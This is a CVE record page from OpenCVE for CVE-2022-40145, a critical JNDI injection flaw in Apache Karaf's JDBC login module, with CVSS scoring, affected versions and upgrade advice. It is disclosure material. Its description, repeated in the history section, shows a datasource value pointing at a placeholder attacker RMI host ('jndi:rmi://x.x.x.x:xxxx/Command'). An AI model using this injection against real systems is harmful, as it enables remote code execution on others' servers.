CVE-2022-40145

  1. OpenCVE
  2. Vulnerabilities (CVE)
  3. CVE-2022-40145
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

9.8 /10

CVSS v3 : CRITICAL

V3 Legend

Vector :

Exploitability : 3.9 / Impact : 5.9

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction NONE

Confidentiality Impact HIGH

Integrity Impact HIGH

Availability Impact HIGH

Scope UNCHANGED

References
Link Resource
https://karaf.apache.org/security/cve-2022-40145.txt Vendor Advisory
Configurations

Configuration 1 (hide)

OR cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
History

07 Nov 2023, 03:52

Type Values Removed Values Added
Summary This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

27 Jun 2023, 18:34

Type Values Removed Values Added
CWE CWE-74 NVD-CWE-Other

28 Dec 2022, 19:25

Type Values Removed Values Added
References (MISC) https://karaf.apache.org/security/cve-2022-40145.txt - (MISC) https://karaf.apache.org/security/cve-2022-40145.txt - Vendor Advisory
CPE cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
CVSS v2 : unknown
v3 : unknown 		v2 : unknown
v3 : 9.8
CWE CWE-20
First Time Apache
Apache karaf

21 Dec 2022, 18:08

Type Values Removed Values Added
New CVE
Information

Published : 2022-12-21 16:15

Updated : 2023-12-10 14:48

NVD link : CVE-2022-40145

Mitre link : CVE-2022-40145

CVE.ORG link : CVE-2022-40145

JSON object : View

Products Affected

apache

  • karaf
CWE
NVD-CWE-Other CWE-20

Improper Input Validation

CWE-74

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')